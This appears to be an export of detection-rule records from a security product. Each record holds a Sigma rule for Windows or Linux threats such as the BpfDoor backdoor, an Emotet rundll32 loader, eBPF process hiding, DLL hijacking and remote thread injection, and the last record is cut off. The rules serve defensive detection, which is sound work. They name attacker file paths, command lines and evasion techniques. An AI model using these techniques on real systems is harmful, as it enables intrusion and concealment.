"name": "t1559_bpfdoor_suspicious_execution.yml",
"content": "title: Suspicious File Creation Related to BpfDoor\nid: b9ba963c-9b27-4458-84b7-c2de9615e0ce\ndescription: |\n Detects the creation of files with names linked to the BpfDoor backdoor.\n BpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\n Those names are related to files that are written by BpfDoor as part of its initialization process.\n It is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor\n - https://dfir.ch/posts/strace/\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/02/02\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.Filesystem\n - classification.Linux.Trojan.BpfDoor\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/var/run/haldrund.pid'\n - '/dev/shm/kdmtmpflush'\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9ba963c-9b27-4458-84b7-c2de9615e0ce",
"rule_name": "Suspicious File Creation Related to BpfDoor",
"rule_description": "Detects the creation of files with names linked to the BpfDoor backdoor.\nBpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\nThose names are related to files that are written by BpfDoor as part of its initialization process.\nIt is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2025-01-30",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9c46a36-6d32-4268-87fb-12db0ddaa32e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604078Z",
"creation_date": "2026-03-23T11:45:34.604081Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604089Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html"
],
"name": "t1218_011_emotet_december_2020_campaign.yml",
"content": "title: Possible Emotet Loader via Rundll32\nid: b9c46a36-6d32-4268-87fb-12db0ddaa32e\ndescription: |\n Detects a December 2020 Emotet campaign featuring a DLL loaded by rundll32.exe with an export being RunDLL or #1.\n Emotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID.\n Emotet first emerged in June 2014, initially targeting the financial sector, and has expanded to multiple verticals over time.\n It is recommended to analyze actions and network connection performed by RunDLL32 and to analyze the loaded DLL to look for malicious content.\nreferences:\n - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html\ndate: 2021/01/14\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - attack.s0367\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.Emotet\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_commandline:\n # loader / downloader\n # \"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\XXXXXX\\Y559jsv\\Iewfmy3\\Ppnq9j.dll,#1\n # final payload\n # C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\XXXXXXX\\AppData\\Local\\Fbdo\\mwnjpc.eab\",RunDLL\n CommandLine:\n - '*\\appdata\\local\\\\*\",RunDLL*'\n - '*\\appdata\\local\\\\*,RunDLL*'\n - '*:\\users\\\\*??????.dll,#1*' # might be a little too \"broad\"\n # - ',#1' too generic - function load by ordinal is not Emotet specific\n\n exclusion_fp:\n CommandLine|contains:\n # exclude xxx.dll,RunDLL samples (shouldn't have many)\n # here we rely on the fact that emotet samples don't have a DLL extension, but a random one\n - '.dll,RunDLL'\n - '.dll\",RunDLL'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9c46a36-6d32-4268-87fb-12db0ddaa32e",
"rule_name": "Possible Emotet Loader via Rundll32",
"rule_description": "Detects a December 2020 Emotet campaign featuring a DLL loaded by rundll32.exe with an export being RunDLL or #1.\nEmotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID.\nEmotet first emerged in June 2014, initially targeting the financial sector, and has expanded to multiple verticals over time.\nIt is recommended to analyze actions and network connection performed by RunDLL32 and to analyze the loaded DLL to look for malicious content.\n",
"rule_creation_date": "2021-01-14",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9f8a579-5b67-4940-94e9-1d38b637280e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625483Z",
"creation_date": "2026-03-23T11:45:34.625485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625489Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_rundll32_extension.yml",
"content": "title: DLL with Suspicious Extension Loaded via RunDLL32\nid: b9f8a579-5b67-4940-94e9-1d38b637280e\ndescription: |\n Detects the suspicious loading a DLL via rundll32.exe with an unusual DLL file extension.\n Adversaries may place DLLs on disk and attempt to mask them as other types of files by changing their file extensions to avoid detection.\n Following this detection, it is recommended to investigate the process tree of RunDLL32 to look for suspicious processes and analyze the loaded DLL for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/12/19\nmodified: 2025/12/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1218.011\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'RUNDLL32.EXE'\n LibraryType: 'Native'\n ImageLoaded|endswith:\n - '.?'\n - '.??'\n - '.???'\n\n filter_known_extensions:\n ImageLoaded|endswith:\n - '.dll'\n - '.tmp'\n - '.ocx'\n - '.cpl'\n - '.inf'\n - '.wcx'\n - '.drv'\n - '.dll.mui'\n - '.bpl'\n - '.exe'\n - '.sys'\n - '.scr'\n\n filter_known_images:\n ImageLoaded|endswith:\n - '\\rundll32.exe'\n - '\\Windows\\System32\\ntoskrnl.exe'\n\n exclusion_spoolsv:\n ImageLoaded|startswith: '?:\\Windows\\System32\\spool\\drivers\\'\n\n exclusion_legitimate_folders:\n ImageLoaded|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\PROGRA~?\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\Syswow64\\'\n - '?:\\Windows\\installer\\'\n\n exclusion_ssnetmon:\n ProcessCommandLine|startswith: 'rundll32 ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,'\n\n exclusion_mojo:\n ProcessCommandLine|contains|all:\n - '--mojo-platform-channel-handle='\n - '--no-sandbox '\n - '--log-file='\n\n exclusion_seagull:\n ProcessCommandLine: 'RunDLL32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\ss#*,DAL_Proxy \\\\\\\\.\\pipe\\Seagull-DriverDLLProxy-????????'\n\n exclusion_musnotofication:\n ProcessCommandLine:\n - 'rundll32.exe ?:\\Windows\\system32\\MusNotification.exe'\n - 'rundll32.exe ?:\\Windows\\system32\\MusNotification.exe Display'\n - 'rundll32.exe ?:\\Windows\\system32\\MusNotification.exe LogonUpdateResults'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_runtelemetry:\n ProcessCommandLine|startswith: '?:\\WINDOWS\\system32\\rundll32.exe invagent,RunUpdate -noappraiser '\n ProcessParentCommandLine: '?:\\Windows\\system32\\rundll32.exe generaltel.dll,RunTelemetry -maintenance'\n\n exclusion_canon:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe fdprint,InvokeTask /ss *#schemas.canon.com#Scanner#*'\n\n exclusion_legitimate_images:\n ImageLoaded:\n # Windhawk\n - '?:\\ProgramData\\Windhawk\\Engine\\mods\\\\*\\\\*.whl'\n - '?:\\Users\\\\*\\Downloads\\Windhawk\\AppData\\Engine\\Mods\\\\*\\\\*.whl'\n # Skel\n - '?:\\Users\\\\*\\AppData\\Local\\\\*\\SKEL\\\\*.Tls'\n # Radvision\n - '?:\\Users\\\\*\\AppData\\Local\\Radvision\\Installer\\Package\\\\*.pkg'\n # DocRouter\n - '*\\DocRouter\\RFI*.ndr'\n # KSC\n - '*\\Plugins\\ksvla*.windows.plg\\basegui.ppl'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9f8a579-5b67-4940-94e9-1d38b637280e",
"rule_name": "DLL with Suspicious Extension Loaded via RunDLL32",
"rule_description": "Detects the suspicious loading a DLL via rundll32.exe with an unusual DLL file extension.\nAdversaries may place DLLs on disk and attempt to mask them as other types of files by changing their file extensions to avoid detection.\nFollowing this detection, it is recommended to investigate the process tree of RunDLL32 to look for suspicious processes and analyze the loaded DLL for malicious content.\n",
"rule_creation_date": "2025-12-19",
"rule_modified_date": "2025-12-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9fa1c53-0625-4fe7-8725-9eec7202b1f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619849Z",
"creation_date": "2026-03-23T11:45:34.619851Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619856Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf",
"https://github.com/pathtofile/bad-bpf/blob/main/src/pidhide.bpf.c",
"https://attack.mitre.org/techniques/T1014/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_process_hiding_via_ebpf.yml",
"content": "title: Process Hiding via eBPF\nid: b9fa1c53-0625-4fe7-8725-9eec7202b1f2\ndescription: |\n Detects an eBPF hook on getdents64, the directory listing syscall that rootkits often exploit to hide processes from user space tools.\n By attaching an eBPF hook to getdents64, the attacker can scan the returned linux_dirent64 entries for the target PID’s /proc/ directory,\n then overwrites the previous directory entry causing the kernel’s readdir to skip the hidden PID.\n This tricks user space tools (e.g., ls /proc, ps) into never seeing the malicious process.\n It is recommended to check the process which loaded the Extended BPF program for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://github.com/pathtofile/bad-bpf/blob/main/src/pidhide.bpf.c\n - https://attack.mitre.org/techniques/T1014/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2026/01/14\nmodified: 2026/01/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - attack.t1564.001\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_attach'\n FunctionHooked|endswith:\n - 'getdents64'\n - 'getdents'\n\n exclusion_bitdefender:\n Image: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9fa1c53-0625-4fe7-8725-9eec7202b1f2",
"rule_name": "Process Hiding via eBPF",
"rule_description": "Detects an eBPF hook on getdents64, the directory listing syscall that rootkits often exploit to hide processes from user space tools.\nBy attaching an eBPF hook to getdents64, the attacker can scan the returned linux_dirent64 entries for the target PID’s /proc/ directory,\nthen overwrites the previous directory entry causing the kernel’s readdir to skip the hidden PID.\nThis tricks user space tools (e.g., ls /proc, ps) into never seeing the malicious process.\nIt is recommended to check the process which loaded the Extended BPF program for suspicious activities.\n",
"rule_creation_date": "2026-01-14",
"rule_modified_date": "2026-01-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba164938-e1ed-44bd-9bc1-ec80c8e8824a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621927Z",
"creation_date": "2026-03-23T11:45:34.621929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621934Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/"
],
"name": "t1564_net_delete_account.yml",
"content": "title: User Account Deleted via net.exe\nid: ba164938-e1ed-44bd-9bc1-ec80c8e8824a\ndescription: |\n Detects the deletion of a user account via net1.exe.\n Attackers may delete their accounts to hide their traces on infected systems.\n It is recommended to investigate the parent process and which account was deleted for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_base:\n CommandLine|contains: 'user'\n selection_delete:\n CommandLine|contains:\n - '/delete'\n - '/del'\n - '\\delete'\n - '\\del'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_altiris:\n GrandparentCommandLine|contains: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n CommandLine|contains: '?:\\Windows\\system32\\net1 user /delete'\n\n exclusion_servicenow:\n Ancestors: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\msiexec.exe|?:\\Windows\\System32\\msiexec.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n CommandLine:\n - '?:\\WINDOWS\\system32\\net1 localgroup /delete ServiceNow Users'\n - '?:\\WINDOWS\\system32\\net1 localgroup Performance Monitor Users servicenow /delete'\n\n exclusion_bmc:\n Ancestors|startswith:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe|'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxproxy.exe|'\n CommandLine: '?:\\Windows\\system32\\net1 user support /DELETE'\n\n exclusion_pdqdeploy:\n Ancestors: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-1\\PDQDeployRunner-1.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ivanti:\n Ancestors|endswith: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba164938-e1ed-44bd-9bc1-ec80c8e8824a",
"rule_name": "User Account Deleted via net.exe",
"rule_description": "Detects the deletion of a user account via net1.exe.\nAttackers may delete their accounts to hide their traces on infected systems.\nIt is recommended to investigate the parent process and which account was deleted for suspicious activities.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba29e5c4-618e-4bd4-b9cf-5aa4caf00205",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601622Z",
"creation_date": "2026-03-23T11:45:34.601625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601633Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_seanalyzertool.yml",
"content": "title: DLL Hijacking via seanalyzertool.exe\nid: ba29e5c4-618e-4bd4-b9cf-5aa4caf00205\ndescription: |\n Detects potential Windows DLL Hijacking via seanalyzertool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SeAnalyzerToolSA.exe'\n ImageLoaded|endswith: '\\msimg32.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\NETGATE\\'\n - '?:\\Program Files (x86)\\NETGATE\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\NETGATE\\'\n - '?:\\Program Files (x86)\\NETGATE\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Netgate Technologies s.r.o.'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba29e5c4-618e-4bd4-b9cf-5aa4caf00205",
"rule_name": "DLL Hijacking via seanalyzertool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via seanalyzertool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba42bfa6-260e-4950-bcfc-e32a0708078d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087688Z",
"creation_date": "2026-03-23T11:45:34.087690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087694Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_remote_thread_rundll32.yml",
"content": "title: Remote Thread Created inside RunDLL32 Process\nid: ba42bfa6-260e-4950-bcfc-e32a0708078d\ndescription: |\n Detects the creation of a remote thread inside RunDLL32.\n Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\n RunDLL32 is a target of choice for attackers to hide their malicious activity inside a legitimate process.\n The Cobalt Strike Framework uses this technique to try evade detection.\n It is recommended to investigate the process performing the remote injection to ensure its legitimacy and origin, as well as to look for other suspicious actions on the host.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/04/06\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\rundll32.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_wmi:\n ProcessOriginalFileName: 'WmiPrvSE.exe'\n\n exclusion_svchost:\n ProcessOriginalFileName: 'svchost.exe'\n\n exclusion_msmpeng:\n ProcessOriginalFileName: 'MsMpEng.exe'\n\n exclusion_windhawk:\n ProcessImage|endswith: '\\windhawk.exe'\n\n exclusion_edpa:\n ProcessImage|endswith:\n - '\\Manufacturer\\Endpoint\\edpa.exe'\n - '\\Manufacturer\\Endpoint Agent\\edpa.exe'\n\n exclusion_ivanti:\n ProcessImage:\n - '*\\Ivanti\\Endpoint\\EPSecurityService.exe'\n - '*\\Ivanti\\Endpoint\\installer\\installer.exe'\n - '*\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgentAssist.exe'\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Inventory\\LDUrlMonInject64.exe'\n - '?:\\Program Files (x86)\\AppSense\\Application Manager\\Agent\\AMDllInjectionAssist.exe'\n\n exclusion_fshoster:\n ProcessImage|endswith:\n - '\\fshoster64.exe'\n - '\\fshoster32.exe'\n\n exclusion_warsaw:\n ProcessImage|endswith:\n - '\\Topaz OFD\\Warsaw\\core.exe'\n - '?:\\Program Files\\Diebold\\Warsaw\\core.exe'\n\n exclusion_flexservice:\n ProcessImage|endswith: '\\Immidio\\Flex Profiles\\FlexService.exe'\n\n exclusion_bitdefender:\n ProcessImage|endswith:\n - '\\Bitdefender\\Endpoint Security\\EPSecurityService.exe'\n - '\\Bitdefender\\Bitdefender Security\\bdservicehost.exe'\n\n exclusion_winrr:\n ProcessImage|endswith: '\\Rush Royale PC\\WinRR.exe'\n\n exclusion_citrix:\n ProcessImage|endswith:\n - '\\Citrix\\ICA Client\\appprotection.exe'\n - '\\Citrix\\ICA Client\\Ctx64Injector64.exe'\n - '\\Citrix\\ICA Client\\entryprotect.exe'\n\n exclusion_dxhook:\n ProcessCommandLine|endswith:\n - '\\rundll32.exe DXCap.dll,DXCap_Hook'\n - '\\rundll32.exe DXCap64.dll,DXCap_Hook'\n\n exclusion_panda_dll:\n ProcessImage:\n - '*\\Panda Security\\WAC\\PSNMVInj.dll'\n - '*\\Panda Security\\WAC\\PSNAEInj64.dll'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\helper_64.exe'\n\n exclusion_panda_host:\n ProcessOriginalFileName: 'PSANHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Panda Security S.L.'\n\n exclusion_epson:\n ProcessCommandLine|startswith: 'rundll32.exe ?:\\Program Files (x86)\\EPSON Software\\Download Navigator\\\\*.dll,EPGetVersionEx'\n\n exclusion_symantec:\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_genapi:\n ProcessParentImage|endswith: '\\GenApi.iNot.Client.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'GENAPI'\n\n exclusion_gamemon:\n ProcessImage|endswith:\n - '\\GameMon64.des'\n - '\\GameMon.des'\n ProcessSigned: 'true'\n ProcessSignature: 'INCA Internet Co.,Ltd.'\n\n exclusion_adinsight:\n ProcessOriginalFileName: 'ADInsight'\n 